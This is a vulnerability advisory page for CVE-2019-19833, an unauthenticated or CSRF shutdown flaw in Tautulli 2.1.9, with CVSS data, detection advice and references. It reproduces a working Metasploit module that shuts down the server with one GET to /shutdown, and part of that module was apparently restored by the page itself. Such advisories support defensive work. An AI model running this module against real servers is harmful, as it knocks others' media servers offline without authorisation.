CVE-2019-19833
Published: 2019-12-18
Priority: P3 · CVSS 3.1 base score 6.5 (medium)
Exploit: available (see the Exploit-DB and Metasploit entries below)
EPSS: 14.71% (96.2th percentile)
In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media server. (Also, anonymous access can be achieved in applications that do not have a user login area).
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tautulli | tautulli | — | — |
Detection & IOCs (extracted from sources)
- Monitor for unauthenticated or cross-origin HTTP requests to the /shutdown endpoint on Tautulli instances.
- Alert on anonymous access attempts to Tautulli endpoints, particularly /shutdown, in applications lacking a user login area.
- Detect HTTP requests targeting the /shutdown URL on Tautulli servers, especially from unexpected or external referrers (CSRF vector).
- Note: the vulnerability affects Tautulli 2.1.9 and prior; confirm the version scope before applying detections.
- Note: anonymous access exploitation is only possible in Tautulli deployments that do not have a user login area configured.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H |
| NVD | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
No detection rules found.
Exploit-DB
Tautulli 2.1.9 - Denial of Service (Metasploit)
Source: exploitdb · 2020-01-16
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2019-19833: one unauthenticated GET to /shutdown
# stops the Tautulli server. The class header and initialize() were missing
# from the extracted listing and are restored here in the standard Metasploit
# auxiliary form.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
      'Author' => 'Ismail Tasdelen',
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-19833'],
          ['EDB', '47785']
        ]
    ))
    # Tautulli listens on TCP 8181 by default
    register_options([ Opt::RPORT(8181) ])
  end

  def run
    # Plain GET to the shutdown endpoint; no session or token is required
    res = send_request_raw({
      'method' => 'GET',
      'uri' => '/shutdown'
    })
    if res
      print_status("Request sent to #{rhost}")
    else
      print_status("No reply from #{rhost}")
    end
  rescue Errno::ECONNRESET
    # The server may drop the connection while it is shutting down
    print_status('Connection reset')
  end
end
```
Metasploit
Tautulli v2.1.9 - Shutdown Denial of Service
Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/155710/Tautulli-2.1.9-Cross-Site-Request-Forgery.html
- http://packetstormsecurity.com/files/155974/Tautulli-2.1.9-Denial-Of-Service.html
- https://github.com/Tautulli/Tautulli/compare/v2.1.9...v2.1.10-beta